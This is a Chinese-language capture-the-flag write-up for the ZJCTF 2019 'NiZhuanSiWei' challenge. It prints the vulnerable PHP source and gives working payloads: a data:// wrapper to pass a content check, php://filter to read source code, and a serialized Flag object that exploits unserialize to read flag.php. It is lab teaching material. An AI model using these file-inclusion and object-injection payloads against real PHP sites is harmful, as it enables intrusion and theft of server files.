[ZJCTF 2019]NiZhuanSiWei
知识点
- data伪协议放置内容( php5.2.0后),通常用来执行php代码
- file协议读取文件
- 构造序列化内容
过程
主页就是源代码
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
第一个if
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
- 传入一个get型参数text
- text的内容是要得是
welcome to the zjctf
我们使用data伪协议(通常用来执行php代码),我们也可以将内容写入data协议中,让file_get_contents 函数取读取。
使用base64加密一气呵成
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
#附上没有加密的
text=data://text/plain,welcome to the zjctf
第二个if
if(preg_match("/flag/",$file))
看以看到不能直接读取flag
采用filter来读源码,结合base64编码
file=php://filter/read=convert.base64-encode/resource=useless.php
第三个要构造序列化内容
$password = $_GET["password"];
include($file); //useless.php
$password = unserialize($password);
echo $password;
先查看useless.php源码
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
得到一串base64串,解密得到源码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X2938dVp-1627112883193)(C:/Users/Polaris/AppData/Roaming/Typora/typora-user-images/image-20210724153901393.png)]
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
构造序列化内容
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
payload:
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
|